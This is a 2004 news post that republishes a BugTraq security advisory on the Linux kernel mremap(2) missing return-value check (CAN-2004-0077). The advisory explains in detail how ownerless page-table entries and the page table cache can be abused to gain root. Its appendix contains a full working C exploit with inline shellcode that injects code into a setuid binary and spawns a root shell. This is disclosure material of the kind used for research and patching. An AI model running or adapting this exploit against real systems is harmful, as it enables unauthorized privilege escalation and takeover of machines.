Linux: do_mremap VMA limit local privilege escalation

Submitted by lewk
on March 2, 2004 - 11:12am

A new security vulnerability has been found inside of the mremap(2) system call. This vulnerability is completely unrelated to the mremap bug which was disclosed a few months ago. Since no special privileges are required to use this system call, any process may use its unexpected behavior to disrupt the kernel memory management subsystem, which could leave an attacker with full super-user privileges.

This vulnerability is already fixed in 2.6.3 [story], 2.4.25 [story] and 2.2.26 [story]. Read on for a very detailed description of this vulnerability, and proof of concept exploitation code


From: Paul Starzetz [email blocked]
To: BugTraq
Subject: mremap(2) full details available
Date: Mar 1 2004 5:45PM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Synopsis:  Linux kernel do_mremap VMA limit local privilege escalation
           vulnerability
Product:   Linux kernel
Version:   2.2 up to and including 2.2.25, 2.4 up to to and including 
2.4.24, 	
           2.6 up to to and including 2.6.2
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
CVE:       CAN-2004-0077
Author:    Paul Starzetz <ihaquer isec pl>
Date:      March 1, 2004


Issue:
======

A critical security vulnerability has been found in the Linux kernel 
memory 
management code inside the mremap(2) system call due to missing function 
return 
value check. This bug is completely unrelated to the mremap bug 
disclosed on 05-01-2004 except concerning the same internal kernel function code.


Details:
========

The Linux kernel manages a list of user addressable valid memory 
locations on a 
per process basis. Every process owns a single linked list of so called 
virtual 
memory area descriptors (called from now on just VMAs). Every VMA 
describes the 
start of a valid memory region, its length and moreover various memory 
flags 
like page protection. 

Every VMA in the list corresponds to a part of the process's page table. 
The 
page table contains descriptors (in short page table entries PTEs) of 
physical 
memory pages seen by the process. The VMA descriptor can be thus 
understood as a 
high level description of a particular region of the process's page 
table 
storing PTE properties like page R/W flag and so on.

The mremap() system call provides resizing (shrinking or growing) as 
well as 
moving of existing virtual memory areas or any of its parts across 
process's 
addressable space.

Moving a part of the virtual memory from inside a VMA area to a new 
location 
requires creation of a new VMA descriptor as well as copying the 
underlying page 
table entries described by the VMA from the old to the new location in 
the 
process's page table.

To accomplish this task the do_mremap code calls the do_munmap() 
internal kernel 
function to remove any potentially existing old memory mapping in the 
new 
location as well as to remove the old virtual memory mapping. 
Unfortunately the 
code doesn't test the return value of the do_munmap() function which may 
fail if 
the maximum number of available VMA descriptors has been exceeded. This 
happens 
if one tries to unmap middle part of an existing memory mapping and the 
process's limit on the number of VMAs has been reached (which is 
currently 
65535).

One of the possible situations can be illustrated with the following 
picture. 
The corresponding page table entries (PTEs) have been marked with o and 
x:

Before mremap():

(oooooooooooooooooooooooo)     (xxxxxxxxxxxx)
[----------VMA1----------]     [----VMA2----]
      [REMAPPED-VMA] <---------------|


After mremap() without VMA limit:

(oooo)(xxxxxxxxxxxx)(oooo)
[VMA3][REMAPPED-VMA][VMA4]


After mremap() but VMA limit:

(ooooxxxxxxxxxxxxxxoooo)
[---------VMA1---------]
     [REMAPPED-VMA]


After the maximum number of VMAs in the process's VMA list has been 
reached 
do_munmap() will refuse to create the necessary VMA hole because it 
would split 
the original VMA in two disjoint VMA areas exceeding the VMA descriptor 
limit.

Due to the missing return value check after trying to unmap the middle 
of the 
VMA1 (this is the first invocation of do_munmap inside do_mremap code) 
the 
corresponding page table entries from VMA2 are still inserted into the 
page 
table location described by VMA1 thus being subject to VMA1 page 
protection 
flags. It must be also mentioned that the original PTEs in the VMA1 are 
lost 
thus leaving the corresponding page frames unusable for ever.

The kernel also tries to insert the overlapping VMA area into the VMA 
descriptor 
list but this fails due to further checks in the low level VMA 
manipulation 
code. The low level VMA list check in the 2.4 and 2.6 kernel versions 
just call 
BUG() therefore terminating the malicious process.

There are also two other unchecked calls to do_munmap() inside the 
do_mremap() 
code and we believe that the second occurrence of unchecked do_munmap is 
also 
exploitable. The second occurrence takes place if the VMA to be remapped 
is 
beeing truncated in place. Note that do_munmap can also fail on an 
exceptional 
low memory condition while trying to allocate a VMA descriptor.


Exploitation:
=============

The vulnerability turned out to be very easily exploitable. Our first 
guess was 
to move PTEs from one VMA mapping a read-only file (like /etc/passwd) to 
another 
writeable VMA. This approach failed because after the BUG() macro has 
been 
invoked the mmap semaphore of the memory descriptor is left in a closed 
(that is 
down_write()) state thus preventing any further memory operations which 
acquire 
the semaphore in other clone threads.

So our attention came over the page table cache code which was 
introduced early 
in the 2.4 series but not enabled by default. Kernels later than the 
2.4.19 
enable the page table cache. The basic idea of a page table cache is to 
keep 
free page frames recently used for the page tables in a linked list to 
speed up 
the allocation of new page tables.

On Linux every process owns a reference to a memory descriptor 
(mm_struct) which 
contains a pointer to a page directory. The page directory is a single 
page 
frame (we describe the 4kb sized pages case without PAE) containing 1024 
pointers to the page tables. A single page table page on the i386 
architecture 
holds 1024 PTEs describing up to 4MB of process's virtual memory. A 
single PTE 
contains the physical address of the page mapped at the PTE's virtual 
address 
and the page access rights.

The page tables are allocated on demand if a page fault occurs. They are 
also 
freed and the corresponding page frames released to the memory manager 
if a 
process unmaps parts of its virtual memory spanning at least one page 
table page 
that is a region containing at least a 4MB sized and 4MB aligned memory 
area.

There are two paths if a new page table must be allocated: the slow and 
the fast 
one. The fast path takes one page from the head of the page table cache 
while 
the slow one just calls get_free_page(). This works well if the pages 
from the 
page table cache have been properly cleared before inserting them into 
the 
cache. Normally the page tables are cleared by zap_page_range() which is 
called 
from do_munmap. It is very important for the proper operation of the 
Linux 
memory management that all locations of the process's page table 
actually 
containing a valid PTE are covered by the corresponding VMA descriptor.

In the case of the unchecked do_munmap inside the mremap code we have 
found a 
condition leaving a part of the page table uncovered by a VMA. The 
offending 
code is:

[269]	if (old_len >= new_len) {
		do_munmap(current->mm, addr+new_len, old_len - new_len);
		if (!(flags & MREMAP_FIXED) || (new_addr == addr))
			goto out;
	}

This piece of code is responsible for truncating the VMA the user wants 
to remap 
in place. It can be easily seen that do_munmap will fail if 
[addr+new_len, 
addr+new_len + (old_len-new_len)] goes into the middle of a VMA and the 
maximum 
number of allowed VMA descriptors has been already used by the process. 
That 
means also that the page table will still contain valid PTEs from 
addr+new_len 
on. Later in the mremap code a part of the corresponding VMA is moved 
and 
truncated:

[179]	if (!move_page_tables(current->mm, new_addr, addr, old_len)) {
		unsigned long vm_locked = vma->vm_flags & VM_LOCKED;

		if (allocated_vma) {
			*new_vma = *vma;
			new_vma->vm_start = new_addr;
			new_vma->vm_end = new_addr+new_len;
			new_vma->vm_pgoff += (addr-vma->vm_start) >> 

PAGE_SHIFT;

but more PTEs (namely old_len) than the length of the created VMA are 
moved from 
the old location if a new location has been specified along with the 
MREMAP_MAYMOVE flag. This works well only if the previous do_munmap did 
not 
fail. This situation can be illustrated as follows:

before mremap:

       <--  old_len -->
(oooooooooooooooooooooooooooo)
[------|-----VMA1-----|------]
            |---------------------------------> new_addr


after mremap, no VMA limit:
						new_len
(oooooo)              (oooooo)			(oooooo)
[-VMA1-]	      [-VMA3-]			[-VMA2-]


after mremap but VMA limit:
						new_len   [*]
(oooooo                oooooo)			(oooooo)ooooooooo
[-----------VMA1-------------]			[-VMA2-]


Those [*] 'ownerless' PTE entries in the page table can be further 
exploited 
since the memory manager has lost track of them. If the process now 
unmaps a 
sufficiently big area of memory covering those ownerless PTEs, the 
underlying 
page table frame will be inserted into the page table cache but will 
still 
contain valid PTEs. That means that on the next page table frame 
allocation 
inside process P for an address A our PTEs will appear in the page table 
of the 
process P! If that process tries to access the virtual memory at the 
address A 
there won't be also a page fault if the PTEs have appropriate (read or 
write) 
access rights. In other words: through the page table cache we are able 
to 
insert any data into the virtual memory space of another process.

Our code takes the way through a setuid binary, however this is not the 
only one 
possibility. We prepare the page table cache so that there is a single 
empty 
page frame in front of the cache and then a special page table 
containing 'self 
executing' pages. To fully understand how it works we must dig into the 
execve() 
system call.

If an user calls execve() the kernel removes all traces of the current 
executable including the virtual memory areas and page tables allocated 
to the 
process. Then a new VMA for the stack on top of the virtual memory is 
created 
where the program environment and arguments to the new binary are stored 
(they 
have been preserved in kernel memory). This causes a first page table 
frame to 
be allocated for the virtual memory region ranging from 
0xbfc00000-0xc0000000.

As next the .text and .data sections of the binary to be executed as 
well as the 
program interpreter responsible for further loading are mapped into the 
fresh 
virtual memory space. For the ELF linking format this is usually the 
ld.so 
dynamic linker. At this point the kernel does not allocate the 
underlying page 
tables. Only VMA descriptors are inserted into the process's VMA list.

After doing some more work not important for the following the kernel 
transfers 
control to the dynamic linker to execute the binary. This causes a 
second page 
fault and triggers demand loading of the first code page of the dynamic 
linker. 
On a standard Linux kernel this will also allocate a page frame for the 
page 
table ranging from 0x40000000 to 0x40400000.

On a kernel with page table cache enabled both allocations will take 
page frames 
from the cache first. That means that if the second page in the cached 
page list 
contains valid PTEs those could appear instead of the regular dynamic 
linker 
code. It is easy to place the PTEs so that they will shadow the code 
section of 
the dynamic linker. Note that the first PTE entry of a page is used by 
the cache 
code to maintain the page list. In our code we populate the page table 
cache 
with special frames containing PTEs to pages with a short shell code at 
the end 
of the page and fill the pages with a NOP landing zone.

We must also mention that the first mremap hole disclosed on 05-01-2004 
can be 
also very easily exploited through the page table cache. Details are 
left for 
the skilled reader. 

A second possibility to exploit the mremap bug is to create another VMA 
covering 
ownerless PTEs from a read-only file like /etc/passwd.


Impact:
=======

Since no special privileges are required to use the mremap(2) system 
call any 
process may use its unexpected behavior to disrupt the kernel memory 
management 
subsystem.

Proper exploitation of this vulnerability leads to local privilege 
escalation 
giving an attacker full super-user privileges. The vulnerability may 
also lead 
to a denial-of-service attack on the available system memory.

Tested and known to be vulnerable kernel versions are all <= 2.2.25, <= 
2.4.24 
and <= 2.6.2. The 2.2.25 version of Linux kernel does not recognize the 
MREMAP_FIXED flag but this does not prevent the bug from being 
successfully 
exploited. All users are encouraged to patch all vulnerable systems as 
soon as 
appropriate vendor patches are released. There is no hotfix for this 
vulnerability. Limited per user virtual memory still permits do_munmap() 
to 
fail.


Credits:
========

Paul Starzetz <ihaquer isec pl> has identified the vulnerability and 
performed 
further research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION 
PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE 
AUTHORS.


Disclaimer:
===========

This document and all the information it contains are provided "as is", 
for 
educational purposes only, without warranty of any kind, whether express 
or 
implied.

The authors reserve the right not to be responsible for the topicality, 
correctness, completeness or quality of the information  provided in 
this 
document. Liability claims regarding damage caused by the use of any 
information 
provided, including any kind of information which is incomplete or 
incorrect, 
will therefore be rejected.


Appendix:
=========

/*
 *
 *	mremap missing do_munmap return check kernel exploit
 *
 *	gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
 *	./mremap_pte [suid] [[shell]]
 *
 *	Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 *	THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED 
"AS IS"
 *	AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, 
MODIFICATION
 *	WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#include <stdio.h>
#include <stdlib.h>

#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>

#include <asm/page.h>


#define str(s) #s
#define xstr(s) str(s)

//	this is for standard kernels with 3/1 split
#define STARTADDR	0x40000000
#define PGD_SIZE	(PAGE_SIZE * 1024)
#define VICTIM		(STARTADDR + PGD_SIZE)
#define MMAP_BASE	(STARTADDR + 3*PGD_SIZE)

#define DSIGNAL		SIGCHLD
#define CLONEFL		(DSIGNAL|CLONE_VFORK|CLONE_VM)

#define MREMAP_MAYMOVE	( (1UL) << 0 )
#define MREMAP_FIXED	( (1UL) << 1 )

#define __NR_sys_mremap	__NR_mremap


//	how many ld.so pages? this is the .text section length (like cat 	
//	/proc/self/maps) in pages
#define LINKERPAGES	0x14

//	suid victim
static char *suid="/bin/ping";

//	shell to start
static char *launch="/bin/bash";


_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, 		
	  ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, 
			 unsigned long new_len, unsigned long flags, 
			 unsigned long new_addr);

static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
static int i, pid=0;
static char *env[2], *argv[2];
static ulong ret;


//	code to appear inside the suid image
static void suid_code(void)
{
__asm__(
	"		call	callme				\n"

//	setresuid(0, 0, 0), setresgid(0, 0, 0)
	"jumpme:	xorl	%ebx, %ebx			\n"
	"		xorl	%ecx, %ecx			\n"
	"		xorl	%edx, %edx			\n"
	"		xorl	%eax, %eax			\n"
	"		mov	$"xstr(__NR_setresuid)", %al	\n"
	"		int	$0x80				\n"
	"		mov	$"xstr(__NR_setresgid)", %al	\n"
	"		int	$0x80				\n"

//	execve(launch)
	"		popl	%ebx				\n"
	"		andl	$0xfffff000, %ebx		\n"
	"		xorl	%eax, %eax			\n"
	"		pushl	%eax				\n"
	"		movl	%esp, %edx			\n"
	"		pushl	%ebx				\n"
	"		movl	%esp, %ecx			\n"
	"		mov	$"xstr(__NR_execve)", %al	\n"
	"		int	$0x80				\n"

//	exit
	"		xorl	%eax, %eax			\n"
	"		mov	$"xstr(__NR_exit)", %al		\n"
	"		int	$0x80				\n"

	"callme:	jmp	jumpme				\n"
	);
}


static int suid_code_end(int v)
{
return v+1;
}


static inline void get_esp(void)
{
__asm__(
	"		movl	%%esp, %%eax			\n"
	"		andl	$0xfffff000, %%eax		\n"
	"		movl	%%eax, %0			\n"
	: : "m"(old_esp)
	);
}


static inline void cloneme(void)
{
__asm__(
	"		pusha					\n"
	"		movl $("xstr(CLONEFL)"), %%ebx		\n"
	"		movl %%esp, %%ecx			\n"
	"		movl $"xstr(__NR_clone)", %%eax		\n"
	"		int  $0x80				\n"
	"		movl %%eax, %0				\n"
	"		popa					\n"
	: : "m"(pid)
	);
}


static inline void my_execve(void)
{
__asm__(
	"		movl %1, %%ebx				\n"
	"		movl %2, %%ecx				\n"
	"		movl %3, %%edx				\n"
	"		movl $"xstr(__NR_execve)", %%eax	\n"
	"		int  $0x80				\n"
	: "=a"(ret)
	: "m"(suid), "m"(argv), "m"(env)
	);
}


static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;

	memset((void*)addr, 0x90, PAGE_SIZE);
	r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
	ptr = (void*) (addr + PAGE_SIZE);
	ptr -= r+1;
	memcpy(ptr, suid_code, r);
	memcpy((void*)addr, launch, strlen(launch)+1);
}


//	hit VMA limit & populate PTEs
static void exhaust(void)
{
//	mmap PTE donor
	t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), 
PROT_READ|PROT_WRITE,
		  MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
	if(MAP_FAILED==t)
		goto failed;

//	prepare shell code pages
	for(i=2; i<LINKERPAGES+1; i++)
		pte_populate(victim + PAGE_SIZE*i);
	i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), 
PROT_READ);
	if(i)
		goto failed;

//	lock unmap
	base = MMAP_BASE;
	cnt = 0;
	prot = PROT_READ;
	printf("\n"); fflush(stdout);
	for(;;) {
		t = mmap((void*)base, PAGE_SIZE, prot, 
			 MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
		if(MAP_FAILED==t) {
			if(ENOMEM==errno)
				break;
			else
				goto failed;
		}
		if( !(cnt%512) || cnt>65520 )
			printf("\r    MMAP #%d  0x%.8x - 0x%.8lx", cnt, 
base,
			base+PAGE_SIZE); fflush(stdout);
		base += PAGE_SIZE;
		prot ^= PROT_EXEC;
		cnt++;
	}

//	move PTEs & populate page table cache
	ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, 
PAGE_SIZE,	
			 MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
	if(-1==ret)
		goto failed;

	munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
	t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, 		
		 PROT_READ|PROT_WRITE, 
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 
		 0);
	if(MAP_FAILED==t)
		goto failed;

	*t = *((unsigned *)old_esp);
	munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
	printf("\n[+] Success\n\n"); fflush(stdout);
	return;

failed:
	printf("\n[-] Failed\n"); fflush(stdout);
	_exit(0);
}


static inline void check_kver(void)
{
static struct utsname un;
int a=0, b=0, c=0, v=0, e=0, n;

	uname(&un);
	n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
	if(n!=3 || a!=2) {
		printf("\n[-] invalid kernel version string\n");
		_exit(0);
	}

	if(b==2) {
		if(c<=25)
			v=1;
	}
	else if(b==3) {
		if(c<=99)
			v=1;
	}
	else if(b==4) {
		if(c>18 && c<=24)
			v=1, e=1;
		else if(c>24)
			v=0, e=0;
		else
			v=1, e=0;
	}
	else if(b==5 && c<=75)
		v=1, e=1;
	else if(b==6 && c<=2)
		v=1, e=1;

	printf("\n[+] kernel %s  vulnerable: %s  exploitable %s",
		un.release, v? "YES" : "NO", e? "YES" : "NO" );
	fflush(stdout);

	if(v && e)
		return;
	_exit(0);
}



int main(int ac, char **av)
{
//	prepare
	check_kver();
	memset(env, 0, sizeof(env));
	memset(argv, 0, sizeof(argv));
	if(ac>1) suid=av[1];
	if(ac>2) launch=av[2];
	argv[0] = suid;
	get_esp();

//	mmap & clone & execve
	exhaust();
	cloneme();
	if(!pid) {
		my_execve();
	} else {
		waitpid(pid, 0, 0);
	}

return 0;
}

- -- 
Paul Starzetz
iSEC Security Research

http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFAQ3a/C+8U3Z5wpu4RAtOFAKCtT8EM9zn5n/maQlSwTZu2wkdHawCfYlht
WdUJcKDwAzO44Dpmc9IqiEs=
=mMKN
-----END PGP SIGNATURE-----




Related Links: